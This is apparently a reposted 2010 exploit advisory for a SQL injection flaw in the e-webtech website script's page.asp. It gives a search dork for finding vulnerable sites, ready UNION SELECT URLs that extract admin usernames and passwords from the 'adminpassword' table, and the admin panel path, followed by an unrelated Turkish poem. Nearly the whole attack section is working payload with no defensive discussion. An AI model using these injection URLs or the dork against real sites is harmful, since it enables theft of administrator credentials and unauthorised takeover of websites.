e-webtech (page.asp) SQL注入漏洞

发布:wpulog | 发布时间: 2010年5月12日

e-webtech (page.asp) SQL注入漏洞 =>

-------------------------------------------------------------------------------------------

e-webtech (page.asp) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Name: e-webtech

Dork: "Powerd by www.e-webtech.com"

-------------------------------------------------------------------------------------------

User Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,username+from+adminpassword

Password Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,pwd+from+adminpassword

Administartor Panel:

http://localhost/[path]/controlpanel/

-------------------------------------------------------------------------------------------

Öyle bir özlemişim ki seni
Artık dönsen de olur dönmesen de
Ben her daim yine sana sitemli yine sana hasret giderim
Aziz yar sen bir sabah bu şehri başıma yıkıp gittin
Dağları deviriverdin üstüme hiç çekinmedin
Ben bu şehirde bir daha da sabah görmedim
Günaydınlar olmadı günler aymadı sensiz ........

-------------------------------------------------------------------------------------------

出自：BugZone - http://www.pulog.org/bugs/526/e-webtech_2197/ 转载必须注明！